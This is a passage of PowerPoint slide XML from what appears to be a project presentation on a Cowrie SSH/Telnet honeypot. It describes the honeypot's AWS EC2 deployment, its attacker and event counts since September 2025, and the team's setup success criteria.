                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>SSH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t> (a secure way to connect remotely) or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Telnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t> (an older, less secure way) to attract and observe cyber attackers.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Shape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7411522" y="1852374"/>
            <a:ext cx="6425089" cy="2659975"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 10872"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="030303"/>
          </a:solidFill>
          <a:ln w="22860">
            <a:solidFill>
              <a:srgbClr val="3B3B3B"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="17780" dir="2700000" algn="bl" rotWithShape="0">
              <a:srgbClr val="3B3B3B">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Shape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7434382" y="1875234"/>
            <a:ext cx="6379369" cy="578406"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 45258"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="222222"/>
          </a:solidFill>
          <a:ln/>
          <a:effectLst>
            <a:outerShdw dist="17780" dir="2700000" algn="bl" rotWithShape="0">
              <a:srgbClr val="3B3B3B">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>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9405" y="2015966"/>
            <a:ext cx="289203" cy="289203"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7627144" y="2646402"/>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FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Our Deployment</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1850" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7627144" y="3063240"/>
            <a:ext cx="5993844" cy="1233487"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2400"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>We set up our Cowrie honeypot on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>AWS EC2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>, which is like renting a virtual computer server on Amazon's cloud. It's running </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Amazon Linux 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t> and is located in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>us-east-1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t> region, which means it's hosted in Amazon's North Virginia data center.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Shape 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="4705112"/>
            <a:ext cx="6424970" cy="2659975"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 10872"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="030303"/>
          </a:solidFill>
          <a:ln w="22860">
            <a:solidFill>
              <a:srgbClr val="3B3B3B"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="17780" dir="2700000" algn="bl" rotWithShape="0">
              <a:srgbClr val="3B3B3B">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Shape 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="816650" y="4727972"/>
            <a:ext cx="6379250" cy="578406"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 45258"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="222222"/>
          </a:solidFill>
          <a:ln/>
          <a:effectLst>
            <a:outerShdw dist="17780" dir="2700000" algn="bl" rotWithShape="0">
              <a:srgbClr val="3B3B3B">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>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1673" y="4868704"/>
            <a:ext cx="289203" cy="289203"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1009412" y="549914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FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Current Stats</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1850" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1009412" y="5915978"/>
            <a:ext cx="5993725" cy="1233487"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2400"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>So far, we've identified </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>43 different individuals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t> or groups trying to access our honeypot. We've been able to pinpoint the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>location for 29 of them</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>. In total, we've recorded </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>669 distinct actions or events</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t> they've attempted on our fake system.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Shape 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7411522" y="4705112"/>
            <a:ext cx="6425089" cy="2659975"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 10872"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="030303"/>
          </a:solidFill>
          <a:ln w="22860">
            <a:solidFill>
              <a:srgbClr val="3B3B3B"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="17780" dir="2700000" algn="bl" rotWithShape="0">
              <a:srgbClr val="3B3B3B">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Shape 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7434382" y="4727972"/>
            <a:ext cx="6379369" cy="578406"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 45258"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="222222"/>
          </a:solidFill>
          <a:ln/>
          <a:effectLst>
            <a:outerShdw dist="17780" dir="2700000" algn="bl" rotWithShape="0">
              <a:srgbClr val="3B3B3B">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>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405" y="4868704"/>
            <a:ext cx="289203" cy="289203"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Text 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7627144" y="549914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FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Live Since</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1850" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Text 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7627144" y="5915978"/>
            <a:ext cx="5993844" cy="616744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2400"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>The Cowrie honeypot has been actively running and collecting data since </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>September 2025</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>.</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5299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DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Success Criteria</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4450" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Shape 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="3032522"/>
            <a:ext cx="4196358" cy="1550075"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 9439"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="030303"/>
          </a:solidFill>
          <a:ln/>
          <a:effectLst>
            <a:outerShdw dist="20320" dir="2700000" algn="bl" rotWithShape="0">
              <a:srgbClr val="3B3B3B">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Shape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="3002042"/>
            <a:ext cx="4196358" cy="121920"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 279070"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="58FF0D"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Shape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2551688" y="2692360"/>
            <a:ext cx="680442" cy="680442"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 134383"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="58FF0D"/>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5761" y="2896433"/>
            <a:ext cx="272177" cy="272177"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051084" y="3599497"/>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Each team member has working Cowrie instance</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Shape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5216962" y="3032522"/>
            <a:ext cx="4196358" cy="1550075"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 9439"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="030303"/>
          </a:solidFill>
          <a:ln/>
          <a:effectLst>
            <a:outerShdw dist="20320" dir="2700000" algn="bl" rotWithShape="0">
              <a:srgbClr val="3B3B3B">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Shape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5216962" y="3002042"/>
            <a:ext cx="4196358" cy="121920"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 279070"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="58FF0D"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Shape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6974860" y="2692360"/>
            <a:ext cx="680442" cy="680442"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 134383"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="58FF0D"/>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8933" y="2896433"/>
            <a:ext cx="272177" cy="272177"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5474256" y="3599497"/>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Can SSH to honeypot and see fake filesystem</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Shape 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9640133" y="3032522"/>
            <a:ext cx="4196358" cy="1550075"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 9439"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="030303"/>
          </a:solidFill>
          <a:ln/>
          <a:effectLst>
            <a:outerShdw dist="20320" dir="2700000" algn="bl" rotWithShape="0">
              <a:srgbClr val="3B3B3B">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Shape 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9640133" y="3002042"/>
            <a:ext cx="4196358" cy="121920"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 279070"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="58FF0D"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Shape 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11398032" y="2692360"/>
            <a:ext cx="680442" cy="680442"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 134383"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="58FF0D"/>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2105" y="2896433"/>
            <a:ext cx="272177" cy="272177"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9897427" y="3599497"/>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Logs are being generated in JSON format</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Shape 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="5149572"/>
            <a:ext cx="6407944" cy="1550075"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 9439"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="030303"/>
          </a:solidFill>
          <a:ln/>
          <a:effectLst>
            <a:outerShdw dist="20320" dir="2700000" algn="bl" rotWithShape="0">
              <a:srgbClr val="3B3B3B">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Shape 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="5119092"/>
            <a:ext cx="6407944" cy="121920"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 279070"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="58FF0D"/>
